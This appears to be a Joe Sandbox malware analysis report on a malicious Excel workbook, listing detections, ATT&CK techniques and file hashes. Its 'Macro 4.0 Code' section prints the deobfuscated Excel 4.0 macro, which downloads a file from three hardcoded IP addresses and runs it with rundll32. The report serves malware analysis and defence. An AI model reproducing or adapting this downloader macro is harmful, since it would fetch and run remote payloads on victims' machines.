Analysis Report Copy-1986428143-05102021.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_ObfuscatedMacroInXLSM | Yara detected Obfuscated Macro In XLSM | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Source: | File opened: |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet |
Source: | Macro 4.0 Deobfuscator: |
Source: | File created: |
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | File read: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Key opened: |
Source: | File opened: |
Data Obfuscation: |
---|
Yara detected Obfuscated Macro In XLSM |
Source: | File source: |
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting (2) | Path Interception | Path Interception | Masquerading (1) | OS Credential Dumping | File and Directory Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | System Information Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting (2) | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 3% | Virustotal | | |
| 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | true | | unknown |
Contacted IPs |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412105 |
Start date: | 12.05.2021 |
Start time: | 12:09:05 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Copy-1986428143-05102021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.evad.winXLSM@1/7@0/0 |
Cookbook Comments: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 92379 |
Entropy (8bit): | 7.654577060340879 |
Encrypted: | false |
SSDEEP: | 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0 |
MD5: | 4A425E6A5A885C0D0E2589506FD2244B |
SHA1: | E23482422480A4720E22F311B42BD65E2F3556F8 |
SHA-256: | 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160 |
SHA-512: | 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 110649 |
Entropy (8bit): | 7.655838404622504 |
Encrypted: | false |
SSDEEP: | 3072:HFmFvKINbjvw548LMb/oqKO8NnS8+60KcGx5C:HVAbT648LM7D98Np+EjU |
MD5: | D49F88AEAACDFF481E03EFC122127935 |
SHA1: | C9C48C5604C50A10A1E56BF7FBC5893CFE10605B |
SHA-256: | F7DDE80E968BF9E918E8BB942BBE52B1F56FDBBC9BE8FB5AC980A6109CDCC146 |
SHA-512: | 005E1CD77F2293C2ED4E2EF5044A58FD3D0591FD3DAE43DC5FC5EF904578CCDB093D9BF149153095A6F14CFD7E3086342AA65386F800CD117BF3CF4DA443370E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.502860878678182 |
Encrypted: | false |
SSDEEP: | 48:83x/XT0jFHRbrVb+Qh23x/XT0jFHRbrVb+Q/:83x/XojFHR1+Qh23x/XojFHR1+Q/ |
MD5: | AA2ED8458B9D332F099FA791BA97B66E |
SHA1: | FBDB1B1C175256CC2E9A47D43C96F2FB66834E7C |
SHA-256: | D8A6D3E527CDE6B3844EDB8AE5047D223922168CC9849C0F65A20C6355E1D853 |
SHA-512: | D367015ECFE6C50B7E01770D0607238917CE24EB79E2D61212B8D2D5CA325CFA014A8A3C0631D831B7F6C90F7BBB405001A2BBECB9B6586036AD81291B178B2A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47933416901871 |
Encrypted: | false |
SSDEEP: | 12:85Qf51LgXg/XAlCPCHaXtB8XzB/oD/xX+WnicvbTfbDtZ3YilMMEpxRljKw6TdJU:85Mp/XTd6jEYeHDDv3q+rNru/ |
MD5: | 4FC739F08AF5475F1999FD33DBDBAFF3 |
SHA1: | 596AADC55288BEF1F3EA7F6615D099DE677E44CA |
SHA-256: | 1C82560F31EA9E8449CF0F6DED094916DBBD5FC5E5890792386684DE4D16BBEE |
SHA-512: | 1C7F98D4005761C4994EE4BFCD439B72ECC9CF24849FD175F039019CABDF6DBCD1F3FA68B74A085861E3BACA0947CA49F9645D44018B813B2989698A63530B02 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.654136034061553 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWtzInTbkBnrl+knTbkBnrlmxWtzInTbkBnrlv:djezI3kBnrz3kBnrzzI3kBnr1 |
MD5: | 046F246D72BF157B46114FABE2BA41DD |
SHA1: | 24E24C3EB2B639EB84D8486D14196DEB28BB5B94 |
SHA-256: | DF25FF89ED3B9688144CC190B29B028927139DCBEFD8113982C832B7F02ED593 |
SHA-512: | 4111BA208D02F60E09E63D2A2A4B1BEF25B3377158C34AF80B1E9E1CDCD3EDBEFE1CBFEFB0C0E3AF3C8B417D47DA0DC067F81C5AF2EF6669D8778BADD5CCE74C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.660932810679595 |
TrID: |
|
File name: | Copy-1986428143-05102021.xlsm |
File size: | 111419 |
MD5: | 1b3705bf5dfab6d67846af3828726e8d |
SHA1: | 22c0e00c0797282d2735cdfab442003b7718fb01 |
SHA256: | 43ab199f616e24562101637463dda6b9f58610dfbcd2cf1db13d0ad699d791a4 |
SHA512: | 303360b4a2fb4f8426e5f943cdc35734bdbaf243f76155bb2b1a44ce0d5f1cb925ea3bf454e0d6fc3e999899c56316a61d94346a6d889c370f109f04afc12d53 |
SSDEEP: | 3072:Qf/vKINbjvw548LMb/oqKO8NnS8+60Kcrc:QfaAbT648LM7D98Np+EJ |
File Content Preview: | PK..........!. +F.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Copy-1986428143-05102021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
="uRlMon"!="URLDow"(0, ="http://185.14.31.59/"=NOW().dat, ..\Nuydar.veryrf, 0, 0)
,,,,,1,,,,,,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""JEIUYUITRYF"")",,,"=CONCATENATE(AG101,AH95,AG99,AG100)",=NOW(),,,,,"=CONCATENATE(AG102,AH95,AG99,AG100)",,,,,,"=CONCATENATE(AG103,AH95,AG99,AG100)",,,=HALT(),,,,"=CONCATENATE(AG106,AG107)",,,,,.d,,"=""uRlMon""",,,,at,,,,,,"=""http://185.14.31.59/""",,"=""JJCCBB""",,,,http://45.138.157.63/,,Belandes,,,,"=""http://167.114.48.59/""",,,,"=REGISTER(AI99,AH98,AI101,AI102,,1,9)",,,=GOTO(AE103),,,"=Belandes(0,AG95,AI105,0,0)",,,,..\Nuydar.veryrf,,"=IF(AE105<0, Belandes(0,AG96,AI105,0,0))",,"=""URLDow""",,,,"=IF(AE106<0, Belandes(0,AG97,AI105,0,0))",,"=""nloadToFileA""",,,,,,,,,,"=IF(AE107<0,CLOSE(0),)",,,,,,,,,,,,=GOTO(Nols!H6),,,,,
,"=""r""",,"=""undll32 ..\Nuydar.veryrf,DllReg""","=""isterServer""",,,,,=EXEC(I7&I9&I10),,,,=HALT(),
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 12:09:38 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f7f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|